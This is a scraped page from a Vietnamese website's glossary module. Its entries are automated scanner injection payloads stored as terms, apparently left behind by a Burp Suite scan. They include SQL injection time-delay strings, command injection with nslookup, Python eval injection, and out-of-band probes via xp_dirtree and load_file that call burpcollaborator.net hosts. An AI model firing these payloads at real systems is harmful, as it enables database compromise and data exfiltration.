Từ điển thuật ngữ

Thêm từ mới
Tìm kiếm :
Bắt đầu với Chứa Chính xác từ
All | 0-9 | b | l | p
Page:  « Prev ... 2 3 4 5 6... Next »
Từ khóa Nội dung
555-555-0199@example.com' waitfor delay'0:0:20'--
555-555-0199@example.com'"`0&nslookup -q=cname hj4z8q4ukzbxr7ikux6st4bzcqihacy9m19vxk.burpcollaborator.net.&`'
555-555-0199@example.com'(select*from(select(sleep(20)))a)'
555-555-0199@example.com');declare @q varchar(99);set @q='\\8dmq2hyleq5olycboo0jnv5q6hc843sulid57tw.burpcollab'+'orator.net\sbq'; exec master.dbo.xp_dirtree @q;--
555-555-0199@example.com');declare @q varchar(99);set @q='\\oe663xz1f664medrp41zob667xdo5jtamyel89x.burpcollab'+'orator.net\ems'; exec master.dbo.xp_dirtree @q;--
555-555-0199@example.com');declare @q varchar(99);set @q='\\tgdb5216hb89ojfwr934qg8b92ft7ovfo3gqaez.burpcollab'+'orator.net\riw'; exec master.dbo.xp_dirtree @q;--
555-555-0199@example.com');declare @q varchar(99);set @q='\\v84dx4t89d0bgl7yjbv6ii0d147vzqnhg58s2gr.burpcollab'+'orator.net\wcm'; exec master.dbo.xp_dirtree @q;--
555-555-0199@example.com')waitfor delay'0:0:20'--
555-555-0199@example.com'+(function(){if(typeof oky8f==="undefined"){var a=new Date();do{var b=new Date();}while(b-a
555-555-0199@example.com'+(select load_file('\\\\5u0njefivnml2vt85lhg4smnnet5l09rcf42yqn.burpcollaborator.net\\gee'))+'
555-555-0199@example.com'+(select load_file('\\\\8irq7h3ljqaoqyhbto5jsvaqbhh893xu0is5mtb.burpcollaborator.net\\ahb'))+'
555-555-0199@example.com'+(select load_file('\\\\gfzy4p0tgy7wn6ejqw2rp37y8peg6bu2xqpdj18.burpcollaborator.net\\wwg'))+'
555-555-0199@example.com'+(select load_file('\\\\xmnfb67anfedunl0xd98wkeff6lxds1j47wuqif.burpcollaborator.net\\dlm'))+'
555-555-0199@example.com'+(select*from(select(sleep(20)))a)+'
555-555-0199@example.com'+eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))+'
Page:  « Prev ... 2 3 4 5 6... Next »
All | 0-9 | b | l | p
Có 199 từ trong nhóm.
 

Ngày Pháp luật Việt Nam 9/11

Hưởng ứng ngày Pháp luật Việt Nam 9/11


time2online Joomla Extensions: Simple Video Flash Player Module

Tác giả tự giới thiệu